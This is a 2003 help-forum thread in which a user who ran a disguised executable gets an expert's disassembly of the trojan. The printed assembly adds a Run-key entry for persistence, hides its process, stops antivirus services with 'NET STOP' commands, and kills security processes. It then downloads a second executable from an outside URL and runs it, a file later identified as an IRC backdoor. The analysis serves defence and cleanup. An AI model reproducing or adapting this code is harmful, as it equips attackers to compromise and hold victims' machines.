?
Solved

What does this asm code do ??????

Posted on 2003-03-07
6
Medium Priority
?
471 Views
Last Modified: 2012-06-21
Hi,

i got the unfortunate accident of running an exe (it was spoofed as another file) and i don't know what it did,
i can't see anything (atm) changed on my pc or broken. but i still like to know what it did !!!!!
if disassembled the file using some tool and gotten some asm code but i don't understand it so please tell me what it does !
the asm code and program (in case u need it) are both here :
http://users.pandora.be/IMS/help/
The program is called dontrun.ttt i renamed it for safety measures just don't run it cause i don't know what it does
the asm code i gotten is in dontrun.asm

please tell me what it does cause i'm a bit worried thanks !!!!!!

0
Comment
Question by:joyrider
[X]
Welcome to Experts Exchange

Add your voice to the tech community where 5M+ people just like you are talking about what matters.

  • Help others & share knowledge
  • Earn cash & points
  • Learn & ask questions
  • 4
  • 2
6 Comments
 
LVL 9

Expert Comment

by:BeyondWu
ID: 8093296
OK, I have downloaded it, after a little investigation, it seems encrypted with a simple compacter(I don't which tool), so I try to debug it, It's dangerous, so I actually haven't run it really, after the loader decrypted the original code in the memory, I dumped it and then disassemble it.
It's a Trojan virus. please search "windows33.exe" and "xtb.exe" in your PC. the xtb.exe is downloaded from this URL "http://www.phoenix.secure-tech.net/web/xxx.exe"
I will post the asm code in the next comment.
0
 
LVL 9

Expert Comment

by:BeyondWu
ID: 8093298
Here is the code, the application list has been omitted, it's too long to put here.
 start:
                 push    100h            ; sizeof szWindowsDir
                 push    offset szWindowsDir
                 call    GetWindowsDirectory
                 push    offset szSlash  ; "\\"
                 push    offset szWindowsDir
                 call    lstrcat
                 push    offset szWindows33_exe ; "windows33.exe"
                 push    offset szWindowsDir
                 call    lstrcat
                 push    offset lpFindFileData
                 push    offset szWindowsDir
                 call    FindFirstFile
                 cmp     eax, 0FFFFFFFFh
                 jz      short NotFound
                 jmp     short FoundIt

 NotFound:
                 push    100h
                 push    offset szVictimExeFile
                 push    0
                 call    GetModuleFileName
                 push    0
                 push    offset szWindowsDir
                 push    offset szVictimExeFile
                 call    CopyFile
                 push    offset sizeofWin33Data
                 push    20006h
                 push    0
                 push    offset aSoftwareMicros ; SOFTWARE\Microsoft\Windows\CurrentVersion\Run
                 push    80000002h
                 call    RegOpenKeyEx
                 push    eax             ; hKey
                 push    offset szWindowsDir
                 push    1
                 push    0
                 push    offset Win33Data ; "windows33"
                 push    ds:sizeofWin33Data
                 call    RegSetValueEx
                 push    ds:sizeofWin33Data
                 call    RegCloseKey

 FoundIt:
                 push    offset szKernel32_dll ; "kernel32.dll"
                 call    GetModuleHandle
                 push    offset aRegisterservic ; "RegisterServiceProcess"
                 push    eax
                 call    GetProcAddress
                 test    eax, eax
                 jz      short CannotFindApi
                 push    1
                 push    0
                 call    eax                                    ; call RegisterServiceProcess
                 jmp     short CallApiSuccessful ; hide myself. only available under Win9x

 CannotFindApi:
                 push    0
                 push    offset aNetStopNavapsv ; "NET STOP NAVAPSVC"
                 call    WinExec
                 push    0
                 push    offset aNetStopPersfw ; "NET STOP PERSFW"
                 call    WinExec
                 push    0
                 push    offset aNetStopAvpcc ; "NET STOP AVPCC"
                 call    WinExec
 
 CallApiSuccessful:
                 lea     esi, pAppList
 
 loopit:
                 lodsb
                 test    al, al                  ; if terminate?
                 jnz     short loopit
                 mov     al, [esi]
                 test    al, al
                 jz      short gotfilenameend
                 push    esi                        ; esi->app name
                 call    killprocess
                 jmp     short loopit

 gotfilenameend:
                 push    100h
                 push    offset szWindowsDir
                 call    GetWindowsDirectory
                 push    offset szSlash  ; "\\"
                 push    offset szWindowsDir
                 call    lstrcat
                 push    offset aXtb_exe ; "xtb.exe"
                 push    offset szWindowsDir
                 call    lstrcat
                 push    offset lpFindFileData
                 push    offset szWindowsDir
                 call    FindFirstFile
                 cmp     eax, 0FFFFFFFFh
                 jz      short HasntFoundIt
                 jmp     short HasFoundIt
 
 HasntFoundIt:
                 call    DownloadIt                  ; if we haven't found it, download it from
                                                                   ; http://www.phoenix.secure-tech.net/web/xxx.exe
 HasFoundIt:
                 push    1388h
                 call    Sleep
                 push    offset aKernel32_dll ; "kernel32.dll"
                 call    GetModuleHandle
                 push    offset aRegisterservic ; "RegisterServiceProcess"
                 push    eax
                 call    GetProcAddress
                 test    eax, eax
                 jz      CannotFindApi
                 jmp     CallApiSuccessful

                 push    eax
                 call    ExitProcess
 
 
 
 killprocess    proc szTargetExeName:LPSTR
                         LOCAL szTmpExeFile[256]:BYTE
                         LOCAL procsentry:PROCESSENTRY32
                 push    ebp
                 mov     ebp, esp
                 add     esp, 0FFFFFDD4h
                 mov     procsentry.dwSize, sizeof PROCESSENTRY32 ;128h
                 push    0      ; means current process
                 push    2
                 call    CreateToolhelp32Snapshot
                 mov     hSnapshot, eax
                 mov     edi, szTargetExeName
                 lea     eax, procsentry
                 push    eax
                 push    hSnapshot
                 call    Process32First
 
 continue:
                 lea     eax, szTmpExeFile
                 push    eax
                 lea     eax, procsentry.szExeFile
                 push    eax
                 call    splitfilename            ; get the file name separate from the path
                 lea     eax, szTmpExeFile
                 push    eax
                 push    edi
                 call    lstrcmpi                  ; compare the exe name with szTargetExeName
                 test    eax, eax
                 jnz     short notequal
                 push    procsentry.th32ProcessID
                 push    0
                 push    1
                 call    OpenProcess                  ; get target process handle
                 push    0
                 push    eax
                 call    TerminateProcess      ; terminate it.
                 push    64h
                 call    Sleep
 
 notequal:
                 lea     eax, procsentry
                 push    eax
                 push    hSnapshot
                 call    Process32Next            ; find next
                 test    eax, eax
                 jz      short finished
                 jmp     short continue
 
 finished:
                 push    hSnapshot
                 call    CloseHandle
                 leave
                 retn    4
 killprocess    endp
 
 
 splitfilename    proc szPathName:LPSTR, szName:LPSTR
                 push    ebp
                 mov     ebp, esp
                 push    esi
                 push    edi
                 push    ebx
                 push    eax
                 mov     esi, szPathName
                 mov     ebx, esi
 
 searchagain:
                 lodsb
                 cmp     al, 0                        ; if terminate?
                 jz      short finished
                 cmp     al, '\'
                 jnz     short searchagain      ; find the '\'
                 mov     ebx, esi                  ; save the position of next char
                 jmp     short searchagain      ; actually, need to find last '\'
 
 finished:
                 mov     edi, szName
                 mov     esi, ebx
 
 loooop:
                 lodsb                                    ; copy the name except the path
                 stosb
                 cmp     al, 0
                 jnz     short loooop
                 pop     eax
                 pop     ebx
                 pop     edi
                 pop     esi
                 leave
                 retn    8
 splitfilename    endp
 
 
 
 DownloadIt      proc near
 repeatit:
                 push    offset lpWSAData
                 push    101h
                 call    WSAStartup
                 cmp     eax, 0
                 jnz     short repeatit      ; if not success
 
 doitagain:
                 push    offset szUrlMicrosoft ; "www.microsoft.com"
                 call    gethostbyname
                 cmp     eax, 0
                 jz      short getnameerror      ; false
                 jnz     short getnameok
 
 getnameerror:
                 push    1388h
                 call    Sleep
                 jmp     short doitagain
 
 getnameok:
                 push    0
                 push    0
                 push    offset szWindowsDir
                 push    offset aHttpWww_phoeni ; "http://www.phoenix.secure-tech.net/web/xxx.exe"
                 push    0
                 call    URLDownloadToFile
                 push    0
                 push    offset szWindowsDir
                 call    WinExec                              ; download it, then execute it.
                 xor     eax, eax
                 call    WSACleanup
                 retn
 DownloadIt      endp

 aXtb_exe        db 'xtb.exe'
                 db 20 dup(0)  
 aHttpWww_phoeni db 'http://www.phoenix.secure-tech.net/web/xxx.exe',0
                 dd 4 dup(0)
                 align 4
 szUrlMicrosoft  db 'www.microsoft.com',0
 aKernel32_dll   db 'kernel32.dll',0
 aRegisterservic db 'RegisterServiceProcess',0
 pAppList        db    0 ;  
 a_avpcc_exe     db '_AVPCC.EXE',0
      ; ... here a long list of application's name omitted ...
 aZonealarm_exe  db 'ZONEALARM.EXE'
                 db 3 dup(0)
 aNetStopNavapsv db 'NET STOP NAVAPSVC',0
 aNetStopAvpcc   db 'NET STOP AVPCC',0
 aNetStopPersfw  db 'NET STOP PERSFW',0
 szSlash         db '\',0
 aSoftwareMicros db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
 Win33Data       db 'windows33',0
                 dd 4 dup(0)
                 db 2 dup(0)
 szWindows33_exe db 'windows33.exe',0
                 dd 4 dup(?)
 sizeofWin33Data dd ?
 hSnapshot              dd ?
                 dd ?
 lpFindFileData  dd 4Fh dup(?)
                 db 2 dup(?)
 szWindowsDir    dd 40h dup(?)
 szVictimExeFile dd 40h dup(?)
 lpWSAData       dd 354h dup(?)
                 db 2 dup(?)
0
 
LVL 9

Expert Comment

by:BeyondWu
ID: 8093306
In addition, I just downloaded the 'http://www.phoenix.secure-tech.net/web/xxx.exe', it is compacted with UPX.
0
On Demand Webinar: Networking for the Cloud Era

Did you know SD-WANs can improve network connectivity? Check out this webinar to learn how an SD-WAN simplified, one-click tool can help you migrate and manage data in the cloud.

 

Author Comment

by:joyrider
ID: 8093903
Hi i uploaded windows33.exe as well it's seems it's just a copy of the original dontrun.exe file. I also immediatly found out it entered a regentry to the reg so i removed that. After downloading XTB.exe my nav found it as a irc.backdoor.trojan

Now i also used it on an older pc where i had a filemonitor and regmonitor running. What was weird is that the windows33.exe file kept looking in the reg to printer settings and also scanned throught the whole mm256.dat in the inter history folder so i guess it collects the sites u've been to get any passwords.

Now the big question since i removed all the startup functions in the reg for this windows33.exe and removed both windows33.exe and xtb.exe can i assume it's safe now ? tried both a complete system scan and a Trojan scan

Ure getting the points since u helped me but just like to know if i need to format or not
0
 
LVL 9

Accepted Solution

by:
BeyondWu earned 1000 total points
ID: 8093928
>>it's safe now ?
I think yes, but I'm not completely sure.
Because It's only a trojan, and it seems hasn't any code to infect other *.exe, so I think it maybe safe, because you have scanned whole system. for more safety, you can search the PE file(*.exe, *.dll, *.ocx,..) which has been modified recently, it maybe infected by the virus, if there no any system file modified recently, you can assume it's safe.
0
 

Author Comment

by:joyrider
ID: 8094007
thanks for the help !ç
0

Featured Post

Free Tool: Port Scanner

Check which ports are open to the outside world. Helps make sure that your firewall rules are working as intended.

One of a set of tools we are providing to everyone as a way of saying thank you for being a part of the community.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

New style of hardware planning for Microsoft Exchange server.
In today's business world, data is more important than ever for informing marketing campaigns. Accessing and using data, however, may not come naturally to some creative marketing professionals. Here are four tips for adapting to wield data for insi…
Monitoring a network: how to monitor network services and why? Michael Kulchisky, MCSE, MCSA, MCP, VTSP, VSP, CCSP outlines the philosophy behind service monitoring and why a handshake validation is critical in network monitoring. Software utilized …
In this video, Percona Solution Engineer Dimitri Vanoverbeke discusses why you want to use at least three nodes in a database cluster. To discuss how Percona Consulting can help with your design and architecture needs for your database and infras…
Suggested Courses

770 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question